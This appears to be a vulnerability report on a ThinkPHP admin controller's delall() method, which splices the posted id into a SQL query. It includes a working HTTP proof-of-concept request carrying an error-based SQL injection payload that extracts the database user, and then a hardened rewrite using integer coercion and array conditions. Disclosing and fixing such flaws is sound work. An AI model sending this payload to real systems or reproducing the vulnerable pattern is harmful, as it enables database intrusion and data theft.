line: 157 - 196

```php
public function delall(){
    //dump($_POST);
    //exit;
    $m=D('Advert'); // database table; the table prefix is defined in the config file, so it is not written here
    $id = I('post.id');
    //dump($id);
    //exit;
    if ($id==null){
        $this->error('请选择删除项!');
    }
    // check whether id is an array or a single value
    if(is_array($id)){
        $where = 'id in('.implode(',',$id).')'; // implode() returns a string built from the array elements
    }else{
        $where = 'id='.$id;
    }
    //dump($where);
    //exit;
    $m=M('Advert');
    $arr=$m->where($where)->select();
    foreach ($arr as $key => $value){
        $images=$value['advert_image'];
        //dump($images);
        //exit;
        unlink('./Uploads/'.$images);
    }
    $count=$m->where($where)->delete();
    // use the save function to modify a form
    if ($count>0){
        $this->success("成功删除{$count}条!");
    } else {
        $this->error('批量删除失败!');
    }
}
```
Because the ThinkPHP framework's safe query syntax is not used here, and $id is spliced directly into the $where variable used for the query, this results in a serious SQL injection vulnerability. It may cause serious harm to the system.
poc:

```http
POST /index.php/manage/kefu/delall HTTP/1.1
Host: www.tuzi.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4o7ddlgmm58fnm8ngse5v5eaq2
x-forwarded-for: 8.8.8.8
x-originating-ip: 8.8.8.8
x-remote-ip: 8.8.8.8
x-remote-addr: 8.8.8.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

id=1//and//(extractvalue(1,concat(0x7e,(select/**/user()),0x7e)))
```
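The fix the report is pointing at is to stop building the `where` clause from a raw string. The following is an added example of a hardened `delall()`, not the project's own code: it assumes a ThinkPHP 3.2-style controller (the `I()`, `M()` helpers and the array form of `where()` with an `'in'` expression, which lets the framework quote and join the values itself), and the class name `AdvertController` is a placeholder. Every id is coerced to a positive integer before it reaches the query, so a body such as the one in the poc collapses to the integer `1` and can no longer alter the query structure.

```php
<?php
// Added example, not the project's code. Assumes ThinkPHP 3.2 helpers:
// I() for input, M() for the model, and where() accepting an array condition.
namespace Manage\Controller;

use Think\Controller;

class AdvertController extends Controller   // placeholder class name
{
    public function delall()
    {
        // Accept a single id or an array of ids, as the original does, but
        // turn every element into a positive integer before it touches SQL.
        $raw = I('post.id');
        $ids = array_values(array_filter(
            array_map('intval', (array) $raw),
            function ($v) { return $v > 0; }
        ));
        if (empty($ids)) {
            $this->error('请选择删除项!');
        }

        // Array condition instead of string concatenation: the framework
        // escapes and joins the values, so no user-controlled text is ever
        // interpreted as SQL. This replaces both the 'id in(...)' and the
        // 'id=' string branches of the original.
        $where = array('id' => array('in', $ids));

        $m   = M('Advert');
        $arr = $m->where($where)->select();
        foreach ($arr as $value) {
            // Same file cleanup as the original, guarded so a missing file
            // does not raise a warning mid-loop.
            $path = './Uploads/' . $value['advert_image'];
            if (is_file($path)) {
                unlink($path);
            }
        }

        $count = $m->where($where)->delete();
        if ($count > 0) {
            $this->success("成功删除{$count}条!");
        } else {
            $this->error('批量删除失败!');
        }
    }
}
```

With this version the same poc body (`id=1//and//(extractvalue(...))`) is reduced by `intval()` to `1`, so the delete runs against `id IN (1)` only; a request carrying no usable integer ids is rejected before any query is issued.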